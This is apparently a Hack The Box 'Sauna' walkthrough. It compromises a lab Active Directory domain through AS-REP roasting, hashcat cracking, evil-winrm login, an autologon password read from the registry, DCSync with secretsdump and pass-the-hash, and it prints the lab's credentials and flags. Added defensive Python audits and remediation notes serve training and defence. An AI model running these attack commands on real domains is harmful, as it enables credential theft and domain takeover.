Sauna – Hack The Box

AS-Rep Roasting

Task 1 – What is the name of the HTML file that reveals the names of users working at the target company?

I started with an nmap scan, hoping to find something on port 80:

──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC -sT 10.129.95.180                        
Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-02-19 20:30 CET
Nmap scan report for 10.129.95.180
Host is up (0.023s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-20 02:30:10Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-02-20T02:30:16
|_  start_date: N/A
|_clock-skew: 6h59m55s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 55.38 seconds

On port 80 there is a website, and the list of employees is on the page IP/about.html.

Task 2 – Which user has Kerberos Pre-Authentication disabled?

In Task 1 we found the domain name “EGOTISTICAL-BANK.LOCAL” (from the nmap scan) and the list of users. Let’s try to AS-REP roast them.

I compiled a list of users based on first name and last name:

Administrator
Guest
krbtgt
DefaultAccount
fergus
hugo
steven
bowie
shaun
sophie
smith
bear
kerb
taylor
coins
driver
fergus.smith
hugo.bear
steven.kerb
bowie.taylor
shaun.coins
sophie.driver
fsmith
hbear
skerb
btaylor
scoins
sdriver
ferguss
hugob
stevenk
bowiet
shaunc
sophied

I then used GetNPUsers.py to find users that have Kerberos Pre-Authentication disabled:

─(kali㉿kali)-[~/Desktop]
└─$ ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.129.95.180 -no-pass -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:8becf4567f72cf76e60d935d8af69182$[remainder of hash elided]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Task 3 – What is the hash format returned from this AS-REP Roasting attack? Give the answer as the string between the first and third $ characters, including the $.

$krb5asrep$23$
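The two steps above (Task 2: finding which accounts have pre-authentication disabled, Task 3: reading the hash format) can be reproduced offline from the defender's side. The following is an added example, not code from the writeup or from Impacket: it audits a list of `(sAMAccountName, userAccountControl)` pairs for the `DONT_REQ_PREAUTH` bit (0x400000, what GetNPUsers.py calls `UF_DONT_REQUIRE_PREAUTH`) and parses a `$krb5asrep$` line into its fields. The account list and the hex in the sample hash line are constructed; the middle number of the tag is the Kerberos encryption type, and 23 is RC4-HMAC, which is why these hashes crack quickly.

```python
"""Added example (not from the original writeup): audit accounts exposed to
AS-REP roasting and parse the hash line the attack yields.

userAccountControl is a bit field; bit 0x400000 (DONT_REQ_PREAUTH) is the one
that makes an account roastable.  Sample data below is constructed and is not
the box's real directory content.
"""
import re

DONT_REQ_PREAUTH = 0x400000   # ADS_UF_DONT_REQUIRE_PREAUTH
ACCOUNT_DISABLED = 0x0002     # ADS_UF_ACCOUNTDISABLE

# Constructed (sAMAccountName, userAccountControl) pairs, as an LDAP query
# for userAccountControl would return them.
SAMPLE_ACCOUNTS = [
    ("Administrator", 0x10200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    ("Guest", 0x10202),           # disabled built-in account
    ("krbtgt", 0x202),            # disabled built-in account
    ("fsmith", 0x410200),         # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH
    ("hsmith", 0x200),            # normal account, pre-auth required
    ("old.svc", 0x400202),        # DONT_REQ_PREAUTH set but account disabled
]


def roastable_accounts(accounts):
    """Enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set.

    Disabled accounts are skipped: the KDC answers KDC_ERR_CLIENT_REVOKED for
    them (the error GetNPUsers.py printed above for two of the built-ins),
    so they yield no AS-REP to crack.
    """
    return [name for name, uac in accounts
            if uac & DONT_REQ_PREAUTH and not uac & ACCOUNT_DISABLED]


# $krb5asrep$<etype>$<user>@<REALM>:<16-byte checksum hex>$<encrypted part hex>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<enc>[0-9a-fA-F]+)$")


def parse_asrep_hash(line):
    """Split one GetNPUsers.py / hashcat -m 18200 line into its fields.

    The 'format tag' Task 3 asks for is everything up to and including the
    third '$'; it is returned under the key 'format_tag'.
    """
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ hash line")
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])
    fields["format_tag"] = "$krb5asrep$%d$" % fields["etype"]
    return fields


# Constructed sample line: user and realm are the box's, the hex is made up.
SAMPLE_HASH = ("$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:"
               "0123456789abcdef0123456789abcdef$" + "ab" * 40)

if __name__ == "__main__":
    print("roastable:", roastable_accounts(SAMPLE_ACCOUNTS))
    parsed = parse_asrep_hash(SAMPLE_HASH)
    print("tag:", parsed["format_tag"], "user:", parsed["user"],
          "realm:", parsed["realm"])
```

In a real audit the account pairs would come from an LDAP query for `userAccountControl:1.2.840.113556.1.4.803:=4194304`; the fix is to clear the "Do not require Kerberos preauthentication" flag on any account that does not need it for a documented reason.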

Task 4 – What is the password of the user fsmith?

I then cracked the password using hashcat:

(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt 

Task 5 – Now that you have a valid set of credentials, on what port can you connect to the machine and get an interactive shell?

We can connect to port 5985 with evil-winrm, using the following command:

──(kali㉿kali)-[~/Desktop]
└─$ evil-winrm -i 10.129.95.180 -u fsmith -p 'Thestrokes23'

Task 6 – Submit the flag located on the fsmith user’s desktop.

The flag is fee7a388998893832c5d9ff29d871ae3

Task 7 – What user is configured to autologin?

The autologon configuration is stored under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. We can query this key with the following command:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x8c9319f7
    ShutdownFlags    REG_DWORD    0x8000022b
    DisableLockWorkstation    REG_DWORD    0x0
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

We now have a new set of credentials:

- username: svc_loanmanager
- password: Moneymakestheworldgoround!
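The registry dump above is a classic audit finding: Winlogon reads DefaultUserName, DefaultDomainName and DefaultPassword when automatic logon is configured, and a DefaultPassword value is a cleartext password readable by anyone who can query HKLM. The following is an added example, not part of the writeup: it parses the text that `reg query` prints for that key and reports the exposure. The sample output is constructed from the layout above, with a placeholder instead of the real password.

```python
"""Added example (not from the original writeup): parse `reg query` output for
the Winlogon key and flag an autologon configuration that stores a cleartext
password.  The sample output is constructed; the password is a placeholder.
"""
import re

# Constructed sample of `reg query "HKLM\...\Winlogon"` output (abridged).
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    LegalNoticeCaption    REG_SZ
    Shell    REG_SZ    explorer.exe
    DefaultPassword    REG_SZ    <placeholder-not-the-real-password>
"""


def parse_reg_query(text):
    """Return {value_name: (type, data)} for one key's `reg query` output.

    reg query separates columns with runs of four spaces, while data such as
    "0 0 0" contains single spaces, so splitting on two-or-more spaces keeps
    the data column intact.  The key path line has no REG_ type and is skipped.
    """
    values = {}
    for line in text.splitlines():
        parts = re.split(r"\s{2,}", line.strip())
        if len(parts) >= 2 and parts[1].startswith("REG_"):
            data = parts[2] if len(parts) > 2 else ""
            values[parts[0]] = (parts[1], data)
    return values


def autologon_account(values):
    """DOMAIN\\user that Winlogon would log on automatically, or None."""
    user = values.get("DefaultUserName", ("", ""))[1]
    if not user:
        return None
    domain = values.get("DefaultDomainName", ("", ""))[1]
    return "%s\\%s" % (domain, user.split("\\")[-1]) if domain else user


def autologon_findings(values):
    """Audit findings as strings; an empty list means nothing of concern."""
    findings = []
    account = autologon_account(values)
    if values.get("DefaultPassword", ("", ""))[1]:
        findings.append("cleartext DefaultPassword stored for %s" % account)
    if values.get("AutoAdminLogon", ("", "0"))[1].strip() == "1":
        findings.append("AutoAdminLogon enabled for %s" % account)
    return findings


if __name__ == "__main__":
    parsed = parse_reg_query(SAMPLE_REG_OUTPUT)
    for finding in autologon_findings(parsed):
        print("[!]", finding)
```

The remediation is to remove the DefaultPassword value entirely; where automatic logon is genuinely required, the Sysinternals Autologon tool stores the password as an LSA secret instead of a readable REG_SZ, and the account used should hold no rights beyond the workstation it logs on to.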

Task 8 – What is the password of the svc_loanmanager user?

The password is Moneymakestheworldgoround!, as found in Task 7.

Task 9 – What dangerous permission does BloodHound show the svc_loanmanager user has over the domain? If there is more than one permission, give the longest.

I tried bloodhound-python from my Kali machine using the newly found credentials but got an error, so I tried using fsmith and it worked.

I then started BloodHound:

- Go to /opt
- ./bloodhound-cli up

The user svc_loanmanager has GetChangesAll on the domain.
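BloodHound's GetChangesAll edge is the DS-Replication-Get-Changes-All extended right on the domain object; replicating secrets (a DCSync) needs it together with DS-Replication-Get-Changes, which is why the task hints at more than one permission. The following is an added example, not part of the writeup or of BloodHound: it evaluates a constructed list of ACEs from a domain object's ACL and reports which principals hold both rights and which of those are not the domain controllers or built-in admin groups expected to hold them. The ACE list and the allow-list of expected holders are assumptions for the demo; the two GUIDs are the real control-access-right GUIDs from the AD schema.

```python
"""Added example (not from the original writeup): find principals whose
replication rights on the domain object would let them DCSync.

The ACE list is constructed.  The GUIDs are the schema's control-access-right
GUIDs for the two replication rights.
"""
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100   # access-mask bit for extended rights
DCSYNC_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Assumed allow-list: principals that legitimately replicate the domain.
EXPECTED_HOLDERS = {
    "Domain Controllers", "Enterprise Domain Controllers",
    "Administrators", "Domain Admins", "Enterprise Admins",
}

# Constructed ACEs: (trustee, ace_type, access_mask, object_type_guid)
SAMPLE_ACES = [
    ("Domain Controllers", "ALLOW", 0x100, DS_REPLICATION_GET_CHANGES),
    ("Domain Controllers", "ALLOW", 0x100, DS_REPLICATION_GET_CHANGES_ALL),
    ("Administrators", "ALLOW", 0x100, DS_REPLICATION_GET_CHANGES),
    ("Administrators", "ALLOW", 0x100, DS_REPLICATION_GET_CHANGES_ALL),
    ("svc_loanmgr", "ALLOW", 0x100, DS_REPLICATION_GET_CHANGES),
    ("svc_loanmgr", "ALLOW", 0x100, DS_REPLICATION_GET_CHANGES_ALL),
    ("backup_reader", "ALLOW", 0x100, DS_REPLICATION_GET_CHANGES),   # one half only
    ("ex_admin", "ALLOW", 0x100, DS_REPLICATION_GET_CHANGES),
    ("ex_admin", "DENY", 0x100, DS_REPLICATION_GET_CHANGES_ALL),     # explicitly denied
    ("helpdesk", "ALLOW", 0x20, DS_REPLICATION_GET_CHANGES_ALL),      # mask lacks CONTROL_ACCESS
]


def replication_rights(aces):
    """Map trustee -> set of replication-right GUIDs effectively allowed.

    Simplified evaluation: an explicit deny for a right removes it regardless
    of ACE order or inheritance, which is conservative for an audit.
    """
    allowed, denied = {}, {}
    for trustee, ace_type, mask, guid in aces:
        if not mask & ADS_RIGHT_DS_CONTROL_ACCESS or guid not in DCSYNC_RIGHTS:
            continue
        bucket = denied if ace_type == "DENY" else allowed
        bucket.setdefault(trustee, set()).add(guid)
    return {t: rights - denied.get(t, set()) for t, rights in allowed.items()}


def dcsync_capable(aces):
    """Trustees holding both rights, i.e. the ones that can pull secrets."""
    return sorted(t for t, rights in replication_rights(aces).items()
                  if DCSYNC_RIGHTS <= rights)


def unexpected_dcsync_holders(aces, expected=EXPECTED_HOLDERS):
    """Audit result: DCSync-capable trustees outside the allow-list."""
    return [t for t in dcsync_capable(aces) if t not in expected]


if __name__ == "__main__":
    print("can DCSync:", dcsync_capable(SAMPLE_ACES))
    print("unexpected:", unexpected_dcsync_holders(SAMPLE_ACES))
```

On a live domain the ACEs come from the domain object's nTSecurityDescriptor (or from BloodHound's own collection). For detection, a DCSync shows up as Directory Service Access event 4662 on the domain controller whose Properties field contains these same GUIDs and whose subject is not a domain controller account.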

Task 10 – You know that the user svc_loanmanager is able to perform a DCSync attack. By doing so, you will get the hash for the Administrator user. What is the common name of the attack that allows users to authenticate with their hashes instead of cleartext passwords?

Pass the hash

Task 11 – Submit the flag located on the administrator user’s desktop.

After some research, I found that GetChangesAll permits dumping hashes. Let’s try to do so using secretsdump:

impacket-secretsdump EGOTISTICAL-BANK/svc_loanmanager@10.129.95.180

I tried, however the authentication failed, which means either the password is not up to date or the username is not valid. After many trials, I checked the sAMAccountName and found the user is svc_loanmgr.

I then performed the DCSync by dumping the hashes with impacket-secretsdump.

I then passed the hash using evil-winrm.

And submitted the root flag.